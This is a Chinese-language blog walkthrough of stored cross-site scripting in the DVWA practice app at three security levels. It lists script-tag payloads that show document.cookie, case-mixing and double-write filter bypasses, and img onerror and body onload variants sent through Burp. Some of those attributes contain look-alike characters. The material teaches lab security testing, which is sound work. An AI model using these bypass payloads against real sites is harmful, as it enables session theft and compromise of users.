【DVWA-master】存储型xss(详)

进入DVWA-master,点击DVWA security ,选择安全级别为low(初级)

点击XSS(Stored)  存储型XSS

一.存储型XSS(初级)

1.name假设输入11(随便输)

在message输入<script>alert(/xss/)</script>

执行按sign guestbook出现谈话框,并且执行完后会下面有记录,若在执行下一条的时候若不先清空会先执行存储的先,所以最好执行一条后就及时清空,按clear guestbook即可

2.查询当前cookie

message输入  <script>alert(document.cookie)</script>

二.存储型XSS(中级)

点击DVWA security ,选择安全级别为medium(中级)

会发现name字段后端限制了字数,所以最好借助burp工具抓包来挖掘,查看程序源码会发现对name段进行了替换,要想办法绕过(可用大小写混淆和双写绕过),跟反射性xss中级差不多,只不过是用到了burp工具

1,大小写混淆绕过

(1)抓包

(2)改成<ScriPt>alert(/xss/)</script> 然后按forward 出现弹框

(3)查询当前页面的cookie  改成<ScriPt>alert(document.cookie)</script>

2.双写绕过(跟上面的一样执行语句就好了)

<sc<script>ript>alert(/xss/)</script>

<sc<script>ript>alert(document.cookie)</script>

二.存储型XSS(高级)

安全级别设置高级,存储型高级也要用burp抓包挖掘,查看程序源码,对<script>进行了过滤,不能用一般的绕过方法,所以可以用其他语句,如img标签和body标签

抓包

(1)用img标签

在burp输入<img src=1 οnerrοr=alert(/xss/)>按forward出现弹框(具体步骤初级有演示这里就不详细演示了)

查询当前页面的cookie

改成<img src=1 οnerrοr=alert(document.cookie)>  

2.用body标签

操作一样

<body οnlοad=alert(/xss/)>   会出现弹框说明有xss漏洞
<body οnlοad=alert(document.cookie)>  查看当前的cookie

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值